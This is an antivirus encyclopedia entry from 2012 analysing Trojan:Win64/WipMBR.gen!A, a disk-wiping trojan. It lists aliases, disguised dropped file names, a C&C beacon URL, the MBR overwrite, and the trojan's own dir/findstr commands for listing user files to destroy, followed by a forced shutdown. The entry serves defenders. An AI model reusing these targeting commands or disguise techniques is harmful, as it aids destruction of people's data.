Home / malware Trojan:Win64/WipMBR.gen!A
First posted on 22 August 2012.
Source: MicrosoftAliases :
Trojan:Win64/WipMBR.gen!A is also known as Troj/MBRWipe-C (Sophos), KillFiles.RK (AVG), Trojan.EraseMBR.I (BitDefender), Trojan.KillMBR.165 (Dr.Web), Trojan.Win64.EraseMBR (Kaspersky), W64/DistTrack!comm (McAfee), Win-Trojan/Disttrack.155136 (AhnLab), WORM_WIPMBR.A (Trend Micro).
Explanation :
Trojan:Win64/WipMBR.gen!A is a trojan that overwrites your computer's MBR (master boot record) and other files, thus preventing you from accessing your operating system and using your computer. The trojan also connects to a remote host and may download arbitrary files.
Installation
Trojan:Win64/WipMBR.gen!A is dropped and run by Trojan:Win64/WipMBR.A on 64-bit operating systems, with one of the following file names:
- caclsrv.exe
- certutl.exe
- clean.exe
- ctrl.exe
- dfrag.exe
- dnslookup.exe
- dvdquery.exe
- event.exe
- extract.exe
- findfile.exe
- fsutl.exe
- gpget.exe
- iissrv.exe
- ipsecure.exe
- msinit.exe
- netx.exe
- ntdsutl.exe
- ntfrsutil.exe
- ntnw.exe
- power.exe
- rdsadmin.exe
- regsys.exe
- routeman.exe
- rrasrv.exe
- sacses.exe
- sfmsc.exe
- sigver.exe
- smbinit.exe
- wcscript.exe
Trojan:Win64/WipMBR.gen!A drops the following files:
%SystemRoot%\system32\netinit.exe
%SystemRoot%\system32\drivers\drdisk.sys
Note: %SystemRoot% refers to a variable location that is determined by the malware by querying the operating system. The default location for the SystemRoot folder for Windows 2000, XP, 2003, Vista and 7 is "C:\Windows".
Once dropped, the "netinit.exe" file's creation time, last access time and last write time are set to be the same as that of the system file "kernel32.dll". Trojan:Win64/WipMBR.gen!A schedules a job to run the file immediately.
The trojan installs the "drdisk.sys" file as a system device driver with the name "drdisk". This file is a clean driver from EldoS that provides "raw disk access".
Raw disk access refers to the underlying data on a disk - the actual ones and zeros that make up all of the data on that disk.
Payload
Contacts remote host
Trojan:Win64/WipMBR.gen!A contacts a private C&C (command and control) server with the following URL:
hxxp://10.1.252.19/ajax_modal/modal/data.asp?mydata=<content/line count of "%SystemRoot%\inf\netft429.pnf">&uid=<local IP>&state=<system tick count>
This URL refers to a local IP address, which could indicate that a second machine is infected on the network and is acting as the C&C server.
Note: <system tick count> is a precise measurement of the number of milliseconds which have elapsed since your computer was last started.
Trojan:Win64/WipMBR.gen!A may download an additional file from the C&C server to the following location:
%SystemRoot%\Temp\filer<random number>.exe
Note: At the time of analysis, the C&C server was inaccessible.
Overwrites the MBR
Trojan:Win64/WipMBR.gen!A overwrites the MBR (master boot record). It also tries to overwrite data on non-system hard disk partitions and the files listed in f1.inf and f2.inf (see the Additional information section in this description) with part of a JPEG file.
Note: No image will be shown as the file is only part of a JPEG and not an actual image.
A non-system hard disk partition is a partition, or area, of a hard disk that does not contain system files or information related to the operation of your computer's operating system.
After overwriting the MBR and other files, it opens a command prompt and runs the command "shutdown -r -f -t 2" to shut down your computer.
Additional information
Trojan:Win64/WipMBR.gen!A opens a command prompt and runs the following commands to get the list of files that it overwrites:
- "dir \"C:\\Documents and Settings\\\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf"
- "dir \"C:\\Documents and Settings\\\" /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf"
- "dir C:\\Users\\ /s /b /a:-D 2>nul | findstr -i download 2>nul >>f1.inf"
- "dir C:\\Users\\ /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf"
- "dir C:\\Users\\ /s /b /a:-D 2>nul | findstr -i picture 2>nul >>f1.inf"
- "dir C:\\Users\\ /s /b /a:-D 2>nul | findstr -i video 2>nul >>f1.inf"
- "dir C:\\Users\\ /s /b /a:-D 2>nul | findstr -i music 2>nul >>f1.inf"
- "dir \"C:\\Documents and Settings\\\" /s /b /a:-D 2>nul | findstr -i desktop 2>nul >f2.inf"
- "dir C:\\Users\\ /s /b /a:-D 2>nul | findstr -i desktop 2>nul >>f2.inf"
- "dir C:\\Windows\\System32\\Drivers /s /b /a:-D 2>nul >>f2.inf"
- "dir C:\\Windows\\System32\\Config /s /b /a:-D 2>nul | findstr -v -i systemprofile 2>nul >>f2.inf"
- "dir f1.inf /s /b 2>nul >>f1.inf"
- "dir f2.inf /s /b 2>nul >>f1.inf"
It stores this list in the following files, in the same location as Trojan:Win64/WipMBR.gen!A:
Related encyclopedia entries
- f1.inf
- f2.inf
Trojan:Win64/WipMBR.A
Analysis by Shawn Wang
Last update 22 August 2012